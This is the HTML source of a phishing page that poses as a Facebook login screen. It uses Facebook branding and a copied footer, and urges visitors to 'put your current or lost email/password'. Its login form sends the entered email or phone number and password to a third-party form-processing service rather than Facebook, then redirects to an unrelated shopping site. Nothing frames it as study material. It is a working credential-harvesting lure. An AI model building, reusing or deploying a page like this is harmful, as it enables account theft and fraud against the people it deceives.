<!DOCTYPE html>
<html style="font-size: 16px;" lang="en"><head>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta charset="utf-8">
    <meta name="keywords" content="">
    <meta name="description" content="">
    <title>Home</title>
    <link rel="stylesheet" href="nicepage.css" media="screen">
<link rel="stylesheet" href="index.css" media="screen">
    <script class="u-script" type="text/javascript" src="jquery.js" defer=""></script>
    <script class="u-script" type="text/javascript" src="nicepage.js" defer=""></script>
    <meta name="generator" content="Nicepage 6.14.4, nicepage.com">
    <meta name="referrer" content="origin">
    <link id="u-theme-google-font" rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:100,100i,300,300i,400,400i,500,500i,700,700i,900,900i|Open+Sans:300,300i,400,400i,500,500i,600,600i,700,700i,800,800i">
    
    
    
    
    <script type="application/ld+json">{
		"@context": "http://schema.org",
		"@type": "Organization",
		"name": ""
}</script>
    <meta name="theme-color" content="#478ac9">
    <meta property="og:title" content="Home">
    <meta property="og:type" content="website">
  <meta data-intl-tel-input-cdn-path="intlTelInput/"></head>
  <body data-home-page="Home.html" data-home-page-title="Home" data-path-to-root="./" data-include-products="false" class="u-body u-xl-mode" data-lang="en"><header class="u-clearfix u-grey-5 u-header u-header" id="sec-27fa"><div class="u-clearfix u-sheet u-sheet-1">
        <div class="u-clearfix u-custom-html u-expanded-width u-custom-html-1"><!-- Google tag (gtag.js) --></div>
      </div></header>
    <section class="u-clearfix u-grey-5 u-section-1" id="sec-66fb">
      <div class="u-clearfix u-sheet u-sheet-1">
        <div class="u-border-1 u-border-grey-5 u-expanded-width-xs u-form u-radius u-white u-form-1">
          <form action="https://forms.nicepagesrv.com/v2/form/process" class="u-clearfix u-form-spacing-22 u-form-vertical u-inner-form" source="email" name="form" style="padding: 12px;" redirect-address="https://minimalshoppingstore.netlify.app/" redirect="true">
            <div class="u-form-group u-label-none">
              <label for="name-ffcf" class="u-label">Name</label>
              <input placeholder="Email address or phone number" id="name-ffcf" name="name" class="u-border-grey-15 u-input u-input-rectangle u-input-1" required="required" type="text">
            </div>
            <div class="u-form-group u-form-textarea u-label-none u-form-group-2">
              <label for="textarea-747a" class="u-label">Textarea</label>
              <input rows="4" cols="50" id="textarea-747a" name="textarea" class="u-border-grey-15 u-input u-input-rectangle u-input-2" required="required" type="text" placeholder="Password">
            </div>
            <div class="u-align-left u-form-group u-form-submit u-label-none">
              <a href="#" class="u-border-none u-btn u-btn-submit u-button-style u-custom-color-3 u-btn-1">Log in</a>
              <input type="submit" value="submit" class="u-form-control-hidden">
            </div>
            <p class="u-align-center u-form-group u-form-text u-text u-text-custom-color-3 u-text-1"> Forgotten password?</p>
            <div class="u-border-1 u-border-grey-40 u-form-group u-form-line u-line u-line-horizontal u-line-1"></div>
            <p class="u-align-center u-form-group u-form-text u-text u-text-grey-60 u-text-2"> Connect with Facebook™ support. Put your current or lost email/password </p>
            <div class="u-form-send-message u-form-send-success">Please wait to connect.</div>
            <div class="u-form-send-error u-form-send-message">Type correct email or password.</div>
            <input type="hidden" value="" name="recaptchaResponse">
            <input type="hidden" name="formServices" value="1d17a874-42b4-5488-cc46-e5f61c0522ff">
          </form>
        </div>
        <img class="u-image u-image-contain u-image-default u-image-1" src="images/faceb.png" alt="" data-image-width="800" data-image-height="155">
        <h4 class="u-align-center-xs u-custom-font u-font-arial u-text u-text-3"> Facebook™&nbsp;helps you connect and share with the people in your life.<span style="font-weight: 500;">
            <span style="font-weight: 500;"></span>
          </span>
        </h4>
        <p class="u-align-center u-custom-font u-font-arial u-text u-text-black u-text-4">
          <span style="font-weight: 700;">Create a Page</span> for a celebrity, brand or business.
        </p>
      </div>
    </section>
    
    
    
    
    <footer class="u-align-center u-clearfix u-footer u-white u-footer" id="sec-a53f"><div class="u-clearfix u-sheet u-sheet-1">
        <p class="u-custom-font u-font-arial u-text u-text-default-lg u-text-default-xl u-text-grey-40 u-text-1"> English (UK) . Polski . Español . Français (France) . Italiano . Lietuvių . Română . 中文(简体) . Português . (Brasil) . Deutsch . العر</p>
        <p class="u-align-center-xs u-align-justify-lg u-align-justify-md u-align-justify-sm u-align-justify-xl u-custom-font u-font-arial u-text u-text-grey-40 u-text-2"> Sign Up  Log in  Messenger  Facebook:-&nbsp; Lite  Video  Places  Games  Marketplace  Meta  Pay  Meta:-&nbsp; Store Meta Quest  Meta:-&nbsp; AI  Instagram Threads  Fundraisers  Services  Voting  Information  Centre  Privacy  Policy  Consumer Health  Privacy Privacy  Centre Groups  About  Create  ad  Create  Page  Developers  Careers  Cookies  AdChoices  Terms  Help  Contact  uploading and non-users  Settings  Activity log</p>
      </div></footer>
    
  
</body></html>